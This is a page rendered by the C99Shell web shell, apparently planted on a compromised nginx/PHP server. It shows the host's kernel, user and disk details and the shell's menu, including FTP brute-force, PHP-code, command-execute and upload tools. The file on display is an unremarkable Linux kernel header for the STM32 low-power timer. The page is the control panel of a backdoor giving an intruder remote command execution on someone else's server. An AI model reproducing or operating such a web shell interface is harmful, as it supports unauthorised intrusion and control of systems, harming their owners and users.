!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-oracle-headers-5.15.0-1040/include/linux/mfd/   drwxr-xr-x
Free 83.25 GB of 96.73 GB (86.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     stm32-lptimer.h (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * STM32 Low-Power Timer parent driver.
 * Copyright (C) STMicroelectronics 2017
 * Author: Fabrice Gasnier <[email protected]>
 * Inspired by Benjamin Gaignard's stm32-timers driver
 */

#ifndef _LINUX_STM32_LPTIMER_H_
#define _LINUX_STM32_LPTIMER_H_

#include <linux/clk.h>
#include <linux/regmap.h>

#define STM32_LPTIM_ISR        0x00    /* Interrupt and Status Reg  */
#define STM32_LPTIM_ICR        0x04    /* Interrupt Clear Reg       */
#define STM32_LPTIM_IER        0x08    /* Interrupt Enable Reg      */
#define STM32_LPTIM_CFGR    0x0C    /* Configuration Reg         */
#define STM32_LPTIM_CR        0x10    /* Control Reg               */
#define STM32_LPTIM_CMP        0x14    /* Compare Reg               */
#define STM32_LPTIM_ARR        0x18    /* Autoreload Reg            */
#define STM32_LPTIM_CNT        0x1C    /* Counter Reg               */

/* STM32_LPTIM_ISR - bit fields */
#define STM32_LPTIM_CMPOK_ARROK        GENMASK(4, 3)
#define STM32_LPTIM_ARROK        BIT(4)
#define STM32_LPTIM_CMPOK        BIT(3)

/* STM32_LPTIM_ICR - bit fields */
#define STM32_LPTIM_ARRMCF        BIT(1)
#define STM32_LPTIM_CMPOKCF_ARROKCF    GENMASK(4, 3)

/* STM32_LPTIM_IER - bit flieds */
#define STM32_LPTIM_ARRMIE    BIT(1)

/* STM32_LPTIM_CR - bit fields */
#define STM32_LPTIM_CNTSTRT    BIT(2)
#define STM32_LPTIM_SNGSTRT    BIT(1)
#define STM32_LPTIM_ENABLE    BIT(0)

/* STM32_LPTIM_CFGR - bit fields */
#define STM32_LPTIM_ENC        BIT(24)
#define STM32_LPTIM_COUNTMODE    BIT(23)
#define STM32_LPTIM_WAVPOL    BIT(21)
#define STM32_LPTIM_PRESC    GENMASK(11, 9)
#define STM32_LPTIM_CKPOL    GENMASK(2, 1)

/* STM32_LPTIM_CKPOL */
#define STM32_LPTIM_CKPOL_RISING_EDGE    0
#define STM32_LPTIM_CKPOL_FALLING_EDGE    1
#define STM32_LPTIM_CKPOL_BOTH_EDGES    2

/* STM32_LPTIM_ARR */
#define STM32_LPTIM_MAX_ARR    0xFFFF

/**
 * struct stm32_lptimer - STM32 Low-Power Timer data assigned by parent device
 * @clk: clock reference for this instance
 * @regmap: register map reference for this instance
 * @has_encoder: indicates this Low-Power Timer supports encoder mode
 */
struct stm32_lptimer {
    struct clk *clk;
    struct regmap *regmap;
    bool has_encoder;
};

#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0041 ]--